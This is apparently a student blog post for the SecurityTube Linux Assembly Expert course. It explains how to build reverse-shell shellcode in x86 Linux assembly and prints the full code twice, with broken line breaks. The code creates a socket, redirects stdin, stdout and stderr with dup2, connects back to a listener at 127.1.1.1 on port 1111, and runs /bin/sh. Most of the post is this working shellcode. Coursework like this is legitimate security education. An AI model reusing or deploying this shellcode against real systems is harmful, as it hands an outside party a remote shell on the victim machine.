SLAE Assignment 2 - Reverse Shell
Objective:
The objective of the assignment is to create a reverse shell which connects back to the listener and spawns a shell .
Steps
1. ) Identify the system calls required
2.) Create the Assembly code
3.) Test the compiled binary and create wrapper script
Step1
The major difference between bind shell and reverse shell is that we don't need to bind an IP and port to the socket that we create , instead it uses connect to shovel back a shell to the listener . A reverse shell is very much useful in the cases of firewall filtering for incoming connections . The system calls used are
a. Socket
As usual we create a socket which will be used later to connect .
b. Connect
We use the connect system call to connect to a target IP and port.
c. Dup2
Just like in the bind shell we will be using dup2 to redirect stdin , stdout and stderr to the created socket .
d. Execve
Finally execve is used to execute /bin/sh to the created socket which will be shoveled back to the listening IP and port.
Step2
The next step is to create the assembly code with the above mentioned system calls .
global _start
section .text
_start:
addr: equ 0x0101017F ; ip = 127.1.1.1
port: equ 0x5704 ; port= 1111
; socket(AF_INET, SOCK_STREAM, 0);
cdq
push
0x66 ;
socketcall()
pop eax
push edx
inc edx
push edx
mov ebx, edx
inc edx
push edx
mov ecx, esp
int
0x80 ; call
socketcall()
;dup2 int dup2(int oldfd, int newfd)
xchg
ebx, eax
mov
ecx, edx
loop4dup:
mov
al, 0x3f
int
0x80
dec
ecx
jns
loop4dup
; connect(sockfd, (struct sockaddr
*)&serv_addr, sizeof(serv_addr))
mov al,
0x66 ; socketcall()
xchg ebx, edx
push addr ; 127.1.1.1
push word port ; 1111
push word
bx ; AF_INET
inc ebx
mov ecx, esp
push 0x10
push ecx
push edx
mov ecx, esp
int
0x80 ; call
socketcall()
; execve("/bin/sh", NULL ,
NULL);
push BYTE
11 ;
execve()
pop eax
cdq
mov ecx, edx
push edx
push 0x68732f2f
; //sh
push 0x6e69622f
; /bin
mov ebx, esp
int
0x80 ; call
execve()
Step3
|
global _start
section .text
_start:
addr: equ 0x0101017F ; ip = 127.1.1.1
port: equ 0x5704 ; port= 1111
; socket(AF_INET, SOCK_STREAM, 0);
cdq
push
0x66 ;
socketcall()
pop eax
push edx
inc edx
push edx
mov ebx, edx
inc edx
push edx
mov ecx, esp
int
0x80 ; call
socketcall()
;dup2 int dup2(int oldfd, int newfd)
xchg
ebx, eax
mov
ecx, edx
loop4dup:
mov
al, 0x3f
int
0x80
dec
ecx
jns
loop4dup
; connect(sockfd, (struct sockaddr
*)&serv_addr, sizeof(serv_addr))
mov al,
0x66 ; socketcall()
xchg ebx, edx
push addr ; 127.1.1.1
push word port ; 1111
push word
bx ; AF_INET
inc ebx
mov ecx, esp
push 0x10
push ecx
push edx
mov ecx, esp
int
0x80 ; call
socketcall()
; execve("/bin/sh", NULL ,
NULL);
push BYTE
11 ;
execve()
pop eax
cdq
mov ecx, edx
push edx
push 0x68732f2f
; //sh
push 0x6e69622f
; /bin
mov ebx, esp
int
0x80 ; call
execve()
|
The next step is to assemble , compile and test the shellcode .
As usual we create the object code and then link the assembly file to create the binary . Then we will take opcodes for the shellcode using the trick learned from SLAE and then test the same in the shellcode trying code .
Finally the binary is executed and we can see that the shellcode worked as expected with a reverse connection obtained .
This blog post has been created
for completing the requirements of the SecurityTube Linux Assembly Expert
certification
Student ID: SLAE – 739
No comments:
Post a Comment